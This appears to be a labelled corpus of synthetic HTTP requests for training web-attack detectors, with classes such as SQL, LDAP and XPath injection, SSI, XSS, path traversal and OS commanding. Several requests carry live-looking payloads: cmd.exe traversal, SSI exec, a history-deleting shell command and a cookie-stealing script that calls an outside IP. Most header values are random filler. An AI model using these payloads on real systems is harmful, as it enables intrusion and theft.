If-Match: "FjOW18OY0VgKOlv.PMv"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 50
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 595-7160,98-,4-961
Referer: http://www.gvUl.ch/m6p7ipk/tEent/relnlA.htm
TE: deflate;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: eme8m (sTpg4nZb; fG7ZddWr)
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 598x8169
Via: 9.7 www.pkttom7.jpg, 3.0 www.lenDaNre.html, 3.5 www.dgtg.js
Transfer-Encoding: tlxupn
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46330
Start - Id: 40339
class: SSI
GET /IhIeNHoSr0ezeqtao/d@/nrrOaddiseeeiiK/ih/a8KSGlnBDPB/ba8z/7QUlJHijCnSO2.mdb?EbakBH29wjwlj0n=zI7XtvW&Owwo=ruxp_ns0sea%7Ex%25t%26&-i20GGxprocessing-instructionXY=niudegotoaCeSpd&tdt3iszCenrtb=ael9Ttu0ypasaerfc&lloheiol=7&yoe62pnatL3sein=i6e&7pcmwehn=bibodye&5Ugbodyxo=%3C%21--+++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cnncsnto%5CIabcsgO6u%5Coee3.exe++++d%3A%5Cwt%5Cwww.isatst.org%5Cseounco%5Cdatabase.mdb++++%2Fx++++exporttofoxpro%22--%3E&7galpAa=soyLnh9fxfaAvsinr&iueausdm=6868 HTTP/1.0
Host: www.s2inil.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Language: oct-rUElElom;q=0.9, a8ee-aGxde6ot, e4on-tmefsen
ETag: "92DybpK8BwnnOs@Hzxn"
If-None-Match: "uG69CxE3RD-wDf8cBC"
Pragma: no-cache
Referer: http://www.e1gi.biz/rnede/anfoct/Rstd/vocinyma/t0deat.sh
User-Agent: tmtlg/2.6.4.3.5
Transfer-Encoding: compress

null

End - Id: 40339
Start - Id: 43743
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.dndoeo4.de
Connection: close
Accept: video/mpeg, application/*;q=0.9, application/rtf
Accept-Charset: gb2312, iso-8859-5
Accept-Encoding: gzip;q=0.0, compress;q=0.1
Accept-Language: oxhetet-NfeB;q=0.9
Cache-Control: no-store
Client-ip: 42.85.153.5
Cookie: oGCkxW1FI=Eh2;jnsq0mhftrd=onoeedhao
Cookie2: $Version="25"
Date: Fri, 14 Oct 05 14:20:54 GMT
ETag: "a4XXHLvpw1u1qBnnZ1v"
Expect: fe8gaSr=na4I2h
From: m8Lou@dteama.it
If-Modified-Since: Sun, 03 Jun 07 08:27:55 CET
If-Unmodified-Since: Wed, 05 Oct 05 19:59:45 CET
If-Match: "V._ehxqEihPLSoK"
If-None-Match: "I7ZTKJT.r8qMVGsDvIRf"
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 67
MIME-Version: 3.3
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: Digest uri=/metoEcw/rAgrl/lnkS.wmn
Range: 24481-,44476-
Referer: /sotkhswa/7eos.conf
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: 21pylfx3 (u-jZ6ch0B; tU8hashi; rrvjzGab)
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 337x2229
Via: 1.0 www.Eutphf0.shtml:753, ean/7.0 182.255.63.183, FTP/2.6 181.231.241.123:00117
Transfer-Encoding: deflate
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 634 www.htFnf.png "gu4mczleeNsgdneeh" "Thu, 21 Aug 08 09:54:11 CET"
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43743
Start - Id: 44137
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.j1itcciS.de
Connection: close
Accept: application/zip;q=0.7, image/gif;q=0.6, application/postscript;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, deflate;q=0.8, compress, deflate;q=0.5
Accept-Language: tnagpwek-uasN, igc-agEeue, 3moo-es;q=0.4, l-zwptqpls
Cache-Control: min-fresh=7887
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="549"
Date: Fri, 23 Jul 04 16:53:18 CET
ETag: W/"1NbZPG6M0jtLITPTw7L"
Expect: a4isd=lhzrab3;nfrsWe=ryefi
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "23vjCjkOhxJEpW.KEioe"
If-None-Match: *
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 23
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: ogSor oauhe=c6eam
Range: 2856-325921,765830-7785,3752-597
Referer: http://nca6h.com/aVsorgf/Uhuhdi.fgf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.5 (compatible; Konqueror/6.2; Windows NT; e7hnbboea; ia0en)
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 3.9 227.78.59.36:68246
Transfer-Encoding: identity
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 657 www.tegeEE.jpg "hm9idit" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44137
Start - Id: 38101
class: LdapInjection
GET /gnOrtnrsscharlr/1y74Apd8X51EQl10/tUyB.html?i2eheeib9f0n=twQt0joQ9iAS&LR7yTdEnOJ=tbeCscriptnp&e8cr=eeD&nl=pZiencd%40i&NvQzMfwgf5=89645297&KADUwWA=92910543&WR.HIRvNMUR=%5CDeiSwgt&tuhwan=eNnAr&etrant4s=3etfs%29%28%26%28objectClass+++%3Die*%29&wpn9Zq5=shP6bita4rusr+cdnulllibrh&9slts5eteehuMVt=08 HTTP/1.0
Host: 129.140.146.175
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: us-ascii, iso-8859-6;q=0.2, euc-jp;q=0.9, x-mac-hebrew;q=0.3, iso-2022-kr
Accept-Encoding: 
Accept-Language: hzeaiq-ene9W;q=0.5
Cache-Control: max-stale=43
Client-ip: 80.51.6.160
Cookie: FNWlykX%ue=621;it4boyScaq=e%40E;cseerasaetrdyah=r+aeammochaxp_+L
Cookie2: $Version="433"
Date: Wed, 23 Sep 09 01:09:53 GMT
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 27 Sep 07 06:45:11 GMT
If-Unmodified-Since: Fri, 26 Aug 05 13:34:26 CET
If-Match: *
If-None-Match: *
If-Range: "YP8E1XEmq3KZJtx"
Max-Forwards: 6130
MIME-Version: 1.3
Pragma: lI2w=homy5tEh
Proxy-Authorization: Ounls db5m=ee3eth
Authorization: Basic b3NpZTo4b2xlM2E=
Range: -26705,8389-9530,6-32
Referer: http://www.ioiRm.de/5a2nreo/rtxwqOa/clowejo.dll
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 9.4; ee-g4; rv:8.2.6) Gecko/64174396
UA-CPU: 68000
UA-Disp: 299,6993,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: s8aa/8.6, yeyo7a/9.5
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 164.220.220.166
X-Serial-Number: 2885123328233620
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38101
Start - Id: 36979
class: LdapInjection
GET /insertTH648wp-Su/i4iazr4euetnadrec/liJcnw5r/eRc/qgaeee.jpg?csqU=e%25htacces%5Dc6Z2%3Cohrnnojs0&MnThttpsl=re1oe&zOuinelk=r+og&cssgrppesdni=ttlink%2Bhdemiwpsgwgetboot.ini%3B&ach8tndihyzndr=hnneHr7&h3sioefhariRpee=772387&p5msScas=840205882&d@Fnetcatkhttp=%3Eaitttce5inG%7E&G389h4ieeyIoiiz=t+nlty7anodeS6+%7Enilt&haerdegyhlni7=5cemm%29%28%26%28objectClass++%3D++++Ops*%29&flmumNnaRaySPmm=iPY55A5m.uK&rjUl8=sgP&g0ycaseaotlel=2930&bedh5rmtenoeob=376573&jc7insn0=miMn_7uEi0 HTTP/1.1
Host: www.zrch.it
Connection: tdsau1lz
Accept: image/png;q=0.4
Accept-Charset: koi8;q=0.3, iso-8859-1;q=0.2, ks_c_5601-1987, x-mac-roman
Accept-Encoding: gzip;q=0.6, deflate;q=0.3, compress;q=0.0, deflate;q=0.1, identity;q=0.3
Accept-Language: e-rrftaN, b-2, nrtt-OdiS, mr-tsa5nfyn;q=0.1, ahecna-nk;q=0.0
Cache-Control: max-age=09
Client-ip: 41.167.121.88
Cookie: tg4nanybEifs0=N+;s1BaSt=855053;gtave=8
Cookie2: $Version="2"
Date: Fri, 04 Jun 04 07:02:07 CET
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 06 Jul 04 23:40:22 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 0366
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: dakr8 nhu1=fhnr
Authorization: Digest algorithm=lHno4y97
Range: 84-,-422477,1197-5319
Referer: /ecwart/yeEzfthw/gtaih/4cpog7.php4
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: xhwposer/8.3
UA-CPU: StrongARM
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: 6eo02
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36979
Start - Id: 35135
class: SqlInjection
PUT /k-.b1TGq9HBKvSzn5/ensp2nnDuNhd1dxt/eMposition/hV3/9xG_iE9Dy/radminpositionmXFD/ErrhoiuoageEee/7MIbua1Ew.bin? HTTP/1.0
Content-Length: 286
Content-Language: hueao,sse
Content-Encoding: gzip
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: dWR5aDdVdGV3YXR6b3NsbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Wed, 04 Aug 04 11:19:56 UTC
Host: www.tsnsn.de
Connection: close
Accept: video/mpeg;q=0.1, image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=4694
Client-ip: 131.178.58.253
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="43"
Date: Mon, 27 Jul 09 08:40:46 CET
ETag: "wECWPXUQhi-PB9N"
Expect: eel5Noee
From: hnfn@paunju2xam.uk
If-Modified-Since: Fri, 17 Mar 06 15:57:27 UTC
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Jun 08 21:53:42 CET
Max-Forwards: 8172
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: /ehrer/sa27drk/IU73ie/1jC1sae.bin
TE: trailers,chunked;q=0.4
User-Agent: Mozilla/2.1 (X11; U; SunOS sun4u 2.7; Er-lc; rv:1.0.7) Gecko/75741559
UA-Disp: 549,7798,16
UA-OS: Windows NT
UA-Color: color8
Via: 9.1 www.egdsn.js:8915
Transfer-Encoding: compress
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qeeanc=736833537&RotiptrNeosgan=263&awnioqsa4=sKz1ZV&ys9ureuvcds=]yrmla(&6t=48891&hheyevfd=vfnm&Kj88QN=705061235&_8DopenG=7&rensot='    ) UNION   ALL  SELECT   oaa    FROM     Tiehe   WHERE     (    '' =   '&etrfges5g=60697&hcar=Yt&6itu=h7-b8J3&oRd=m?ihlfayUdRPallyn

End - Id: 35135
Start - Id: 45849
class: PathTransversal
GET /msjdGvw/b5NWJCDEvbscripticP0/sjsezintf/ltl6duapTgno/stcm/vTQ/UM/Rne/0oGQ.R4aJ_JLQ489by4R.swf?ddgud7ce=er%24+nrsw%5Deah4ha&lyueejtnnie=%5CWINDOWS%5Csystem.ini&ftnasdxebt=184674&pMijNX5dEcEzw=qaensynb8vdeibh&uUeomeaTieo=dxkneR98syb&tnmsrRnmtss9rgb=yantmpreplacel5g&tfubi8aelo=t6n2%5Cf3%29tspRpoe&pJGx=child1dstyleoumeei0&bebwrepomiD0I=eyW HTTP/1.0
Host: 32.184.12.219:60776
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: rr=hoiGsht
Client-ip: 145.76.47.201
Cookie: eolrs=tiad eeascript'Gai2htpass-dnt;Ohdwceen=620;w6noee8hl4wN=r
Cookie2: $Version="5"
Date: Mon, 21 Jun 04 05:33:03 UTC
ETag: W/"mCszWHpD.O1AkJWfA"
Expect: 100-continue
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Thu, 15 Nov 07 23:55:37 CET
If-Unmodified-Since: Tue, 24 Jan 06 10:56:52 UTC
If-Match: "bR06A5pCpULriHvqL"
If-None-Match: "dOSpM7@hAs4J7L56Pi"
If-Range: *
Max-Forwards: 16
MIME-Version: 9.0
Pragma: dlsui='gRSoe'
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: oslnau lehthen=tauTbq
Range: 505894-77
Referer: http://www.rhjrr.biz/zai8iha.tar.gz
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.2 (Windows; U; Win 9x 2.4; tu-zl; rv:2.0.8) Gecko/36775052
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 3.6 159.111.214.156
Transfer-Encoding: gzip
Upgrade: nx6d/2.5, grzln/9.5
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45849
Start - Id: 43504
class: OsCommanding
GET /o47M8Qm7.5KMlh9PK@/k4U9jdY/oYtRH/2solsndafesphaIea/er6a8dnh8ry/he/n@0I50ptnTej3KXGCaB/protttudgoes6raAt0n/i9oorgHas/ezTieO8mTnotedtUo7bl.mspx?iqfnteeO=8HbUiqrOetifEsa&end8ea=090333337&reebOeLm5nGo=8horcOahbeh9ca&lweddthsitaey=38428199&otaotit=3&otgoaama=%27%3B+++++rm++%7E%2F.bash_history++%3B&Oa34m=1452 HTTP/1.1
Host: 6.32.162.133
Connection: close
Accept: text/*, text/plain;q=0.8, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ou7nTh-ao;q=0.0, qune0blr-ltoFget;q=0.2, xats-J88Uso;q=0.6
Cache-Control: max-age=346
Client-ip: 220.97.61.79
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="644"
Date: Tue, 21 Oct 08 18:34:06 UTC
ETag: "1ZIJyiA7qSu4@.@P-w"
Expect: qEtoe
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Mon, 08 Dec 08 16:01:11 GMT
If-Unmodified-Since: Sat, 19 Jul 08 07:18:23 UTC
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: "xsv5pvPX4p8SBZq85"
Max-Forwards: 35
MIME-Version: 3.4
Pragma: soH=eettxf
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Digest realm
Range: 32-61,4386-85
Referer: http://Aoeo.net/8saqsdl.wmn
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: e0aqfmd-74 http://www.odetofe.biz
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: HTTP/1.2 17.84.251.253, tmn/7.3 www.coaE.jpg:1
Transfer-Encoding: esitp; nsGtoLtt=droiiFd
Upgrade: nRo2i/0.2, uniywa/5.6, g4s/3.9, urxwij/6.4
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43504
Start - Id: 47154
class: XSS
GET /serrzttgdtIe8Ofo/ohjXm/eZ2QEqKeH@q/hl4ta_S_I40PJTbwv/hdvMSSj1rD5K9@3iaL/_3bdropZscriptqLa.cgi?xnth=Kchildprocessing-instructionu%40Wr%3Cdropnhnetcat&lbebLe=%3Cimg+src+++%3D++++%22+++++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F50.254.120.180%2Fng.cfm%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E HTTP/1.0
Host: www.JwtceHziwt.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: oEsqenic=eb
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Fri, 01 Jan 10 21:10:46 CET
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: 100-continue
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Thu, 22 Nov 07 16:20:04 GMT
If-Match: *
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: *
Max-Forwards: 2479
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: gfom gs7ueewn=wirhur
Range: -016,1-,67332-47295
Referer: /E9o0roe/Paouine.tiff
TE: trailers
Trailer: If-Modified-Since
User-Agent: 7VJbt8 http://www.itfur.cz
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 098 www.se8ib.png "Tiuetid8Hcaheepfhsi9" "Wed, 22 Feb 06 01:21:28 GMT"
X-Forwarded-For: 27.208.219.12
X-Serial-Number: 155966371996
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47154
Start - Id: 42260
class: SqlInjection
GET /2Z1Dhx25rIRqj/oedysoaontdnlns7wRos/uorHi5nlheao/eh/ity/havingCizadmin/wsd4/mu/ijBkam3.54iQCJfIeVt.shtml?1ald=Nmi0&imo7As=%27%29++++UN%2F**%2FION++ALL++SEL%2F**%2FECT+++%27l33eptb%27%2C22%2C6%2C%27akeavtt%27%2C9+++FROM++++s3t+WHERE+++++%28+++%27%27++++%3D++++%27 HTTP/1.0
Host: 160.119.62.147:4
Connection: hosna0te
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, gzip;q=0.2, identity, gzip;q=0.2
Accept-Language: m-iaA;q=0.0, aufzpbtm-laeboik, tdrdhe-q;q=0.7
Cache-Control: no-cache
Client-ip: 164.216.181.230
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="528"
Date: Thu, 01 Apr 04 03:33:21 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Wed, 30 Apr 08 18:20:40 UTC
If-Unmodified-Since: Wed, 15 Mar 06 11:07:30 GMT
If-Match: "9JuIF-B5gGJFWRMb"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.4
Pragma: ds=si4
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 041331-40746,8485-207,-9
Referer: /erlwn.asp
TE: chunked,gzip;q=0.0
Trailer: Range
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 1.5; is-ry; rv:6.4.6) Gecko/62835186
UA-CPU: Sparc
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4325x083
Via: FTP/2.9 www.e0td.html, yjae/3.0 www.oyr9.html, 7.3 www.3mzIu.htm
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 050 47.45.71.159 "xvo7fEn2eRnq" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42260
Start - Id: 39631
class: SSI
GET /2QQ4X1/vYX.LX_/9emroiel2i/isTooIwr/LtcahnThsg/tn3xa/tsa6lyemrt5mldeenkns/sR/b8kbetweenMyTxAJopenII2boot.ini.swf?Twdileonuc=s0cncr&95Pa=%7C&nAvkogedeue16=lUl&uzophgSB=An&ih9=%3C%21--+++++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++--%3E&temhsleuresatde=7540&yPscriptH0R2GRpG=29&neoP4hou=null&giePloe8u2sssji=m0ub&4toHsucoEi=lD2&cuNq4s81LL-t=i1W8Odx3eeJ%40&e2Ieddih=74&l0wTr=o4t+stnl%2BheoaSwp-&frnaazenthyuo=eSYcE-eYCk2 HTTP/1.1
Host: 3.58.79.149
Connection: keep-alive
Accept: image/png;q=0.5, text/plain, audio/basic
Accept-Charset: windows-874;q=0.4, big5;q=0.2, windows-1252;q=0.6, big5, windows-1250;q=0.5
Accept-Encoding: *
Accept-Language: ul1w9tE-ctalro, satlp6d-soo0onc;q=0.4, 0-lsptae8l;q=0.4, eceKdet-rf0r;q=0.2
Cache-Control: max-stale=527
Client-ip: 79.170.36.207
Cookie: o2ouvbei=MbeEcrtm;gin5seh=2713;ldcua4Ylw=almsolrcpY4at;bdRnt=8
Cookie2: $Version="9"
Date: Mon, 26 Sep 05 15:59:45 UTC
ETag: "@Py@vCbgWDBllPns"
Expect: 100-continue
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Tue, 08 Jun 04 07:43:26 CET
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: Thu, 09 Jun 05 17:28:28 GMT
Max-Forwards: 6214
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="ca0eC9FFBaBD708764D39d770FFc77F2"
Range: -8469,086240-,65-225201
Referer: /hdtnm/tEfiuiet/eollkrf.php
TE: gzip;q=0.5
Trailer: Cache-Control
User-Agent: gnty (rk-gme; owGwEMES; spR8QG)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2034x6396
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: identity
Upgrade: o7s/5.6, dipl/2.7
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 48.154.117.69
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39631
Start - Id: 48939
class: XPathInjection
GET /orBYQYCzr/dznX5at/gV2winnttP/C1BpassthruiB9_f/lfgolcEtngor3an/tHYea7C/VGUNRm.9PygLRC/fen6bahca/stTeilkhttepol/bpzcroir9hcycry4/passthruRwhere6homeu/h9xteEaopissae.html?-MlR=94&o12=92484100&Lam1efemel1e=s53&aepsoutjhonhs=sSrCRzIMxz5D&eeanxi=e%3Bcopyxa-ee&tDf=n5z0pm%27+++++or+%28i+++%3C++++count%28Nta8%2Fchild%3A%3Atext%28%29%29+++++and+++j++++%3C++++count%28tnrEm%2Fchild%3A%3Acomment%28%29%29+and+k+++++%3C+count%28Iu4%2Fchild%3A%3A*%29++++%29+++or+++%27iryaausf%27+++%3D%27+V0%27++or HTTP/1.0
Host: 6.87.221.117
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 163.68.137.81
Cookie: ruAiceo=k3syo
Cookie2: $Version="818"
Date: Mon, 22 Jun 09 22:59:10 UTC
ETag: "Wnu8c7V6mR2JtbrB"
Expect: ghd27=dnsedlo;desEue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 20 Mar 04 08:12:22 GMT
If-Unmodified-Since: Fri, 17 Nov 06 16:47:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 9
MIME-Version: 5.2
Pragma: d='todogc'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic dDhhZms6ZWU0aTl0
Range: 326-470558,-0121
Referer: /d0ol/UcD1oc/is9p/ilar.php4
TE: trailers
Trailer: Proxy-Authorization
User-Agent: oWCh@OO_x http://www.heiwt.net
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/3.7 www.ftrdetb.gif, FTP/2.3 71.122.154.30, 2.5 www.raolifss.js
Transfer-Encoding: compress
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 129 www.iLdnews.tiff:319 "mv1aiMea" "Wed, 18 Oct 06 24:35:06 CET"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48939
Start - Id: 37090
class: LdapInjection
GET /aUtBOW1_i/iauinedlatin/an@-8f9gJ_yqb/T0e.-Blxtmpmv/1depuRos8gxqIc.gif?ataewee=4781%29%28%26%28objectClass%3Dils%29%28%7C%28sn+%3D+++fc%29%28cn%3Ds+++J*%29%29&gluondLf7n=wudar&larxshi=oohonwrmeeolcrc&Eooaerbugiycsii=1 HTTP/1.0
Host: www.ue7ncee3e.be:4618
Connection: eq43NE
Accept: application/*, video/quicktime, text/*;q=0.0
Accept-Charset: koi8-r;q=0.5, iso-8859-15;q=0.6, windows-1250
Accept-Encoding: gzip, compress, gzip, compress;q=0.0, compress;q=0.5
Accept-Language: nural30j-odie, hjeel-eKsecdrh, siai-m1s
Cache-Control: max-stale=37496
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="3"
Date: Fri, 06 Jan 06 04:46:30 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: 0res@4luu6h.st
If-Modified-Since: Wed, 28 Sep 05 09:23:58 GMT
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: "ZtapEphV2gNgqeiD3C"
Max-Forwards: 3006
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic czJhc0Vkcmg6cG5lbnNpcnQ=
Range: -02647,-19,13378-743741
